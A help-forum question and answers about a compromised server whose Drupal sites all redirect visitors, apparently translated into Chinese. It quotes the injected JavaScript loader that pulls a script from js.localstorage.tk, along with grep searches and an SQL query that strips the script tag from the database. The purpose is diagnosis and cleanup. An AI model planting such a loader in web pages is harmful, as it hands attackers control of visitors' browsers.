Javascript 注入一个服务器的所有drupal网站

Javascript injected in all drupal websites of a server

最近几天,我的网站遭到了恶意攻击。当我打开一个网站时 http://site1.com 它首先会重定向到另一个页面(可能是广告页面)。

在 chrome 浏览器中,当我尝试通过控制台 (F12) 诊断问题时,我发现它向我显示了一个奇怪的错误。 "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" 和 url 是 - https://js.localstorage.tk/s.js?crt=new。在进一步调查中,我发现它会在该特定服务器上每个网站的每个页面加载时注入以下脚本。 (不是一个站点而是 3-4 个站点在同一台服务器上受到相同攻击的感染)。

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

我也曾尝试在受感染网站的托管文件系统中找到此代码片段,使用了如下各种 "grep" 命令,但我找不到任何东西。

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

但没有恶意注入脚本的线索。数据库调查的结果相同。

当我在没有互联网的情况下通过 LAN 访问我的网站时,出现了同样的错误和一些奇怪的问题 URL:

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

最糟糕的是,现在 google 已将我的网站列入 "Dangerous" 列表,并显示带有深红色背景的警告 "Deceptive site ahead"。

任何帮助...!!!

使用此命令查找代码

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

你应该检查你的数据库。

我遇到了同样的问题,在 body_summary 列的 field_data_body table 的每一行中找到了脚本。

使用以下查询对所有 table 执行 a:%js.localstorage.tk%

这是一个删除查询:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");